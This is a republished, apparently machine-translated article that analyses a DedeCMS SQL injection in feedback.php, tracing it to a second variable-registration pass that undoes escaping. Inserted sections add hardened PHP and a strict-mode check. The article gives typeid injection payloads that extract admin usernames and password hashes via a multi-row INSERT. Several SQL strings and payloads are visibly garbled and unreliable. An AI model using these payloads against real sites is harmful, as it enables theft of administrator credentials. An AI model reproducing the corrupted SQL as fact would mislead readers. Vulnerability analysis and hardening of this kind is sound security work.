2025-03-30 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)06/01 Report--
This article analyses a SQL injection in DedeCMS, explaining its cause and the corresponding fix, for readers who want a simple and workable way to understand and address the problem.
Vulnerable file: plus/feedback.php.
The problematic code:
```php
...
if($comtype == 'comments')
{
    $arctitle = addslashes($title);
    if($msg != '')
    {
        // the $typeid variable is not initialized here
        $inquery = "INSERT INTO `feedback` (`aid`, `typeid`, `username`, `arctitle`, `ip`, `ischeck`, `dtime`, `mid`, `bad`, `good`, `ftype`, `face`, `msg`)
            VALUES ('$aid','$typeid','$username','$arctitle','$ip','$ischeck','$dtime','{$cfg_ml->M_ID}','0','0','$feedbacktype','$face','$msg'); ";
        echo $inquery; // debugging: output the query statement
        $rs = $dsql->ExecuteNoneQuery($inquery);
        if(!$rs)
        {
            ShowMsg('wrong comment!', '-1');
            // echo $dsql->GetError();
            exit();
        }
    }
}
// quoted reply
elseif($comtype == 'reply')
{
    $row = $dsql->GetOne("SELECT * FROM `dede_feedback` WHERE id = '$fid'");
    $arctitle = $row['arctitle'];
    $aid = $row['aid'];
    $msg = $quotemsg.$msg;
    $msg = HtmlReplace($msg, 2);
    $inquery = "INSERT INTO `feedback` (`aid`, `typeid`, `username`, `arctitle`, `ip`, `ischeck`, `dtime`, `mid`, `bad`, `good`, `ftype`, `face`, `msg`)
        VALUES ('$aid','$typeid','$username','$arctitle','$ip','$ischeck','$dtime','{$cfg_ml->M_ID}','0','0','$feedbacktype','$face','$msg')";
    $dsql->ExecuteNoneQuery($inquery);
}
```
The complete INSERT statement; its second parameter, typeid, is under the submitter's control:
INSERT INTO `feedback` (`aid`, `typeid`, `username`, `arctitle`, `ip`, `ischeck`, `dtime`, `mid`, `bad`, `good`, `ftype`, `face`, `msg`) VALUES ('108mmsg`) VALUES (' 108cm', '108',' paxmac','127.0.0.1','1','1351774092',',
The common.inc.php file processes every request:
```php
function _RunMagicQuotes(&$svar)
{
    if(!get_magic_quotes_gpc())
    {
        if(is_array($svar))
        {
            foreach($svar as $_k => $_v) $svar[$_k] = _RunMagicQuotes($_v);
        }
        else
        {
            if(strlen($svar) > 0 && preg_match('#^(cfg_|GLOBALS|_GET|_POST|_COOKIE)#', $svar))
            {
                exit('Request var not allowable');
            }
            $svar = addslashes($svar);
        }
    }
    return $svar;
}
......
foreach(Array('_GET', '_POST', '_COOKIE') as $_request)
{
    foreach($$_request as $_k => $_v)
    {
        if($_k == 'nvarname') ${$_k} = $_v;
        else ${$_k} = _RunMagicQuotes($_v);
    }
}
....
```
... .
From the code above you can see that it escapes externally submitted data, but the filter.inc.php file then does the following:
```php
function _FilterAll($fk, &$svar)
{
    global $cfg_notallowstr, $cfg_replacestr;
    if(is_array($svar))
    {
        foreach($svar as $_k => $_v)
        {
            $svar[$_k] = _FilterAll($fk, $_v);
        }
    }
    else
    {
        if($cfg_notallowstr != '' && preg_match("#".$cfg_notallowstr."#i", $svar))
        {
            ShowMsg("$fk has not allow words!", '-1');
            exit();
        }
        if($cfg_replacestr != '')
        {
            $svar = preg_replace('/'.$cfg_replacestr.'/i', "***", $svar);
        }
    }
    return $svar;
}
/* filter _GET, _POST, _COOKIE */
foreach(Array('_GET', '_POST', '_COOKIE') as $_request)
{
    foreach($$_request as $_k => $_v)
    {
        ${$_k} = _FilterAll($_k, $_v);
    }
}
```
The code above handles sensitive words, but it registers the request variables a second time, which produces a second variable-overwrite vulnerability. This hole has in fact existed for a long time: only the keys of a one-dimensional array are checked for submitted variables, so the check can be bypassed to create system configuration variables that should not be allowed. DedeCMS's patching has always been baffling: the patches are superficial and the actual root cause of the vulnerability is never changed. Judging from this patch, it only added one line checking whether $typeid is numeric, and continued to ignore the 80sec anti-injection code that has already been bypassed twice.
So with GPC=OFF, the variables escaped in the first pass are overwritten again in the second pass and become plain, unescaped input.
E.g.: typeid=2\' is overwritten back to typeid=2'
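The ordering problem described above, reproduced and then hardened, as an added example that is not DedeCMS code. The first function imitates the two registration passes in a few lines (escape, then re-read the raw request and overwrite); the second part shows the shape a safe handler takes: read only the named fields, validate their types, take typeid from the article row rather than the request, and bind every value with prepared statements. The function names, the simplified table layout and the in-memory SQLite database used for the demonstration are this example's own assumptions, not DedeCMS's.

```php
<?php
// Added example (not DedeCMS code): the two-pass registration bug and a hardened handler.

// --- 1. The vulnerable pattern: two passes that both write into the same scope.
function vulnerable_register(array $request, array &$scope): void
{
    // Pass 1 (common.inc.php style): escape every value when magic_quotes is off.
    foreach ($request as $k => $v) {
        $scope[$k] = addslashes($v);
    }
    // Pass 2 (filter.inc.php style): the word filter re-reads the *raw* request and
    // assigns into the same scope, so the escaped copy from pass 1 is overwritten.
    foreach ($request as $k => $v) {
        $scope[$k] = preg_replace('/badword/i', '***', $v);
    }
}

// --- 2. Hardened: one pass, no global registration, explicit fields and types.
function hardened_read_feedback(array $request): array
{
    // Only the fields the handler needs are read, each with a type check.
    $aid = filter_var($request['aid'] ?? '', FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($aid === false) {
        throw new InvalidArgumentException('aid must be a positive integer');
    }
    $msg = trim((string) ($request['msg'] ?? ''));
    if ($msg === '') {
        throw new InvalidArgumentException('msg is required');
    }
    // typeid is deliberately NOT read from the request: it belongs to the article.
    return ['aid' => $aid, 'msg' => $msg];
}

function hardened_insert_feedback(PDO $db, array $request, string $username, string $ip): int
{
    $in = hardened_read_feedback($request);
    // typeid and title come from the article row, closing the "uninitialized $typeid" gap.
    $st = $db->prepare('SELECT typeid, title FROM dede_archives WHERE id = :aid');
    $st->execute([':aid' => $in['aid']]);
    $art = $st->fetch(PDO::FETCH_ASSOC);
    if ($art === false) {
        throw new RuntimeException('no such article');
    }
    // Every user-controlled value is a bound parameter; nothing is concatenated into SQL.
    $ins = $db->prepare(
        'INSERT INTO dede_feedback (aid, typeid, username, arctitle, ip, ischeck, dtime, msg)
         VALUES (:aid, :typeid, :username, :arctitle, :ip, 0, :dtime, :msg)'
    );
    $ins->execute([
        ':aid' => $in['aid'], ':typeid' => (int) $art['typeid'], ':username' => $username,
        ':arctitle' => $art['title'], ':ip' => $ip, ':dtime' => time(), ':msg' => $in['msg'],
    ]);
    return (int) $db->lastInsertId();
}

// --- Demonstration with a constructed request (assumed sample, run with: php this_file.php).
$request = ['typeid' => "2'", 'aid' => '108', 'msg' => 'hello'];
$scope = [];
vulnerable_register($request, $scope);
echo "after pass 1 only : ", addslashes($request['typeid']), "\n";
echo "after both passes : ", $scope['typeid'], "\n";

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE dede_archives (id INTEGER PRIMARY KEY, typeid INTEGER, title TEXT)');
$db->exec('CREATE TABLE dede_feedback (id INTEGER PRIMARY KEY AUTOINCREMENT, aid INTEGER,
           typeid INTEGER, username TEXT, arctitle TEXT, ip TEXT, ischeck INTEGER, dtime INTEGER, msg TEXT)');
$db->exec("INSERT INTO dede_archives VALUES (108, 5, 'Sample article')");
$id  = hardened_insert_feedback($db, $request, 'guest', '127.0.0.1');
$row = $db->query('SELECT typeid, msg FROM dede_feedback WHERE id = ' . (int) $id)->fetch(PDO::FETCH_ASSOC);
echo "hardened row      : typeid={$row['typeid']} msg={$row['msg']}\n";
```

The point of the hardened version is not the escaping but the removal of the two things the write-up relies on: request keys are never turned into global variables, so no second pass can undo a first one, and typeid is not an input at all, so a numeric check on it (the change the patch made) becomes irrelevant.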
Readers who studied the previous DedeCMS SQL injection problem will know its anti-injection mechanism; here is a brief analysis. It treats the content between \' and \' as trustworthy and does not check it, so the check can be avoided simply by placing the code inside ''. Using one piece of MySQL syntax, the value of @``` is empty. Here is how the exploit is constructed:
Typeid=123',@ ```, 0x11111111111pr 1351739660, 0pje 0re0pl 0pl 0pl 0pl 0je (SELECT concat (uname,0x5f,pwd,0x5f) FROM dede_admin)), (108 dje 1111)
I submitted this parameter using Tamper Data.
In fact, a small bug is also used here.
You can see from its table structure that only msg can be null, but the code uses null in username, which is an illegal statement; inserted alone it will not succeed, but the latter row holds: with insert (a,b) values (1,1),(2,2), where (1,1) is illegal and (2,2) meets the conditions, both rows are inserted successfully at the same time. Because of the limit on the number of characters displayed, the msg field is chosen as the output.
Addendum: in `aid`, `typeid`, `username`, `arctitle`, `ip`, `ischeck`, `dtime`, `mid`, `bad`, `good`, `ftype`, `face`, `msg`, aid is the ID of the article, so using my statement directly will not succeed; you need to change it to your own article ID.
Typeid=123',@ ```, 0 × 11111, 1111 ID,'1111 1351739660, 0meme 0meme 0memo 0, (SELECT concat (uname,0x5f,pwd,0x5f) FROM `dede_ admin`)), (comment article ID,'1111
If submitted with Tamper Data (article id=123), msg is changed to www.hack6.com
Mcbang&typeid=0','3','4','5','0','1351739660',%20'0','0','0','0','0','aaaaaa'), ((SELECT concat (uname,0x5f,pwd,0x5f) from'@ # _ admin'), (1351739660), (1351739660).
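The multi-row INSERT behaviour used above depends on MySQL running without a strict sql_mode: when neither STRICT_TRANS_TABLES nor STRICT_ALL_TABLES is set, a NULL written to a NOT NULL column by a multi-row INSERT is replaced with the column's implicit default and only a warning is raised, whereas a single-row INSERT errors out. The following added example, not DedeCMS code, gives an application a start-up check that refuses to run against such a server; the function names and the sample mode strings are this example's own.

```php
<?php
// Added example (not DedeCMS code): fail closed when MySQL is not in strict mode.

function sql_mode_is_strict(string $sqlMode): bool
{
    // @@sql_mode is a comma-separated list of flags; either strict flag is enough.
    $flags = array_map('strtoupper', array_map('trim', explode(',', $sqlMode)));
    return in_array('STRICT_TRANS_TABLES', $flags, true)
        || in_array('STRICT_ALL_TABLES', $flags, true);
}

function assert_strict_sql_mode(PDO $db): string
{
    // Read the effective session mode (standard MySQL syntax); needs ERRMODE_EXCEPTION on $db.
    $mode = (string) $db->query('SELECT @@SESSION.sql_mode')->fetchColumn();
    if (!sql_mode_is_strict($mode)) {
        throw new RuntimeException(
            "MySQL sql_mode '$mode' is not strict; set sql_mode=STRICT_TRANS_TABLES in my.cnf"
        );
    }
    return $mode;
}

// Offline demonstration on constructed mode strings (no database needed).
$samples = [
    '',                                           // empty mode: not strict
    'NO_ENGINE_SUBSTITUTION',                     // no strict flag: not strict
    'STRICT_TRANS_TABLES,NO_ENGINE_SUBSTITUTION', // MySQL 5.7+ default includes this: strict
    'strict_all_tables',                          // matched case-insensitively: strict
];
foreach ($samples as $s) {
    printf("%-45s strict=%s\n", "'" . $s . "'", sql_mode_is_strict($s) ? 'yes' : 'no');
}
```

In production, call `assert_strict_sql_mode($db)` right after opening the connection, and set the mode persistently in the server configuration rather than per session so that an application cannot silently inherit the lax semantics the write-up exploits.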
This concludes the analysis of how the DedeCMS injection works; I hope the content above is of some help to you.